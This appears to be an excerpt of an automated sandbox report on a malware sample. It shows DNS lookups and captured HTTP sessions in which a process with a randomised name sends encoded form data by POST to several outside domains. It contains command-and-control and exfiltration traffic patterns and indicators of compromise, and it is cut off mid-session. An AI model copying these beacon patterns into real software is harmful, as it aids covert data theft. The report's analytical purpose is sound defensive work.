                Aug 19, 2024 04:26:45.271867037 CEST1.1.1.1192.168.2.40x147aNo error (0)www.catherineviskadi.com217.160.0.106A (IP address)IN (0x0001)false
                Aug 19, 2024 04:26:58.643712997 CEST1.1.1.1192.168.2.40x8947Name error (3)www.hatercoin.onlinenonenoneA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:06.754542112 CEST1.1.1.1192.168.2.40x3d79Name error (3)www.fourgrouw.cfdnonenoneA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:15.140780926 CEST1.1.1.1192.168.2.40xc8b8No error (0)www.bfiworkerscomp.com208.91.197.27A (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:30.014386892 CEST1.1.1.1192.168.2.40x3027Name error (3)www.tinmapco.comnonenoneA (IP address)IN (0x0001)false
                Aug 19, 2024 04:27:40.632994890 CEST1.1.1.1192.168.2.40xc23eNo error (0)www.xn--fhq1c541j0zr.com43.252.167.188A (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:02.954099894 CEST1.1.1.1192.168.2.40x6b15No error (0)www.xn--matfrmn-jxa4m.se194.9.94.85A (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:02.954099894 CEST1.1.1.1192.168.2.40x6b15No error (0)www.xn--matfrmn-jxa4m.se194.9.94.86A (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:16.792520046 CEST1.1.1.1192.168.2.40x9fdfNo error (0)www.anuts.top23.251.54.212A (IP address)IN (0x0001)false
                Aug 19, 2024 04:28:50.844403028 CEST1.1.1.1192.168.2.40xf202No error (0)www.telwisey.info199.192.19.19A (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:04.234004974 CEST1.1.1.1192.168.2.40x33ffNo error (0)www.sandranoll.com213.145.228.16A (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:17.704349995 CEST1.1.1.1192.168.2.40xbf8eNo error (0)www.gipsytroya.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                Aug 19, 2024 04:29:17.704349995 CEST1.1.1.1192.168.2.40xbf8eNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:31.108858109 CEST1.1.1.1192.168.2.40xcafaName error (3)www.helpers-lion.onlinenonenoneA (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:39.175703049 CEST1.1.1.1192.168.2.40x93b1No error (0)www.dmtxwuatbz.cc104.21.45.56A (IP address)IN (0x0001)false
                Aug 19, 2024 04:29:39.175703049 CEST1.1.1.1192.168.2.40x93b1No error (0)www.dmtxwuatbz.cc172.67.210.102A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • www.hprlz.cz
                • www.catherineviskadi.com
                • www.bfiworkerscomp.com
                • www.xn--fhq1c541j0zr.com
                • www.xn--matfrmn-jxa4m.se
                • www.anuts.top
                • www.telwisey.info
                • www.sandranoll.com
                • www.gipsytroya.com
                • www.dmtxwuatbz.cc

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.4497365.44.111.162804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:26:29.510755062 CEST501OUTGET /w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.hprlz.cz
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:26:30.208937883 CEST735INHTTP/1.1 301 Moved Permanently
                Server: nginx
                Date: Mon, 19 Aug 2024 02:26:30 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 382
                Connection: close
                Location: https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 43 6a 3d 51 68 76 38 52 54 4f 38 59 50 76 68 36 4c 33 30 26 61 6d 70 3b 6c 48 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a 42 4e 4b 44 [TRUNCATED]
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.449737217.160.0.106804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:26:45.282705069 CEST790OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d
                Data Ascii: lH=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                Aug 19, 2024 04:26:45.953080893 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:45 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.449738217.160.0.106804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:26:47.825927019 CEST810OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                Data Ascii: lH=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                Aug 19, 2024 04:26:48.524555922 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:48 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.449739217.160.0.106804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:26:50.357610941 CEST10892OUTPOST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10299
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 6b 70 73 79 38 4e [TRUNCATED]
                Data Ascii: lH=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4XZY6WMELCLd5ovk5Lh1oVAOCFvxiPkagwO5xzNRgLr8AaDnbqIR+cz7gZfa1+Pjv+mQaJoljOCpTz4MtDN7K1Awg78y6bbrQyVSnC8wxPy+SHD4IvMFqHbiBUTKP22ARYzPvHAYcfecxm1AfcicCXiBKTgojG61O3CTKcNiFW8p8cNiPS8/plfUDViJJWRNeZJ4h+CMVL2GkvWbuQW4hzrHDKPRGzq+NzxMeYmfsd66IZ+JtdBfJWzzrCMc2IglIAYDLuNiLisG96rwUiK1O1Ndr+ZTVeTAkpsy8N3Z8rD7lcRSzFx9wsgGZssteRr2+8wfmeLQSVInd316fCKzj7ZSx/MmL+7KZAmKuxbX20KqC/UrgjH2QGd49+SJkZtMsCBBlTJxxTR+ss3NtZykLjFEsi6uwKYZm0dPAafUC0eaMjNQzm1xGSoexdOfMVPEplukhxL8jQfFwq6HLfN4iKqJLBlJ77jT0CfOGg8TyycBrggKLk5fY4H724rheygicyuNu9NZVhhWHJZPaKnhHjblfqtQHU76541+e2mV4Xb8NjPIz13kR326M1Rd7kxETl8/axlmDwzkaXnAHYn12oplx7T7vCyxn1sml0cpymgZNGoGvppoYnwLLdmDsQrBhmNAmT+Wo3UzCj8RqWqKE2bg8He7//XPGX4vohdc3ki0XAOJKor4YZrrM4byjsyu1AcU48YJhr33J1vyBq+qz/t0DUXYoXhsZT1+Qu2RLXUQXmoNtfzC8qGGlK/3XRAG31vei16Bil4l3fNfR79BC7Zv/Wk3X6aX5dosNc1hTfAzloltqF7T6tM8Xnr/KGTZ0DPzjfKttuaOGOaWy0tKZy/TLLQA2baUY/e7jYIj4ostkFyMi+lxa0+LOmSZ4x+rwS9hmDaCnNUMaRXwCpU/QyxxFkyhYXDdkvxMCIhO4+wLmd6eYe4BYQuRXS26NQcWO2w9odpY [TRUNCATED]
                Aug 19, 2024 04:26:51.139810085 CEST580INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:50 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.449741217.160.0.106804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:26:52.966120958 CEST513OUTGET /qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.catherineviskadi.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 19, 2024 04:26:53.620855093 CEST770INHTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Mon, 19 Aug 2024 02:26:53 GMT
                Server: Apache
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.449742208.91.197.27804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:15.151654959 CEST784OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 199
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 6c 48 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                Data Ascii: lH=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.449743208.91.197.27804544C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                TimestampBytes transferredDirectionData
                Aug 19, 2024 04:27:17.685692072 CEST804OUTPOST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 219
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
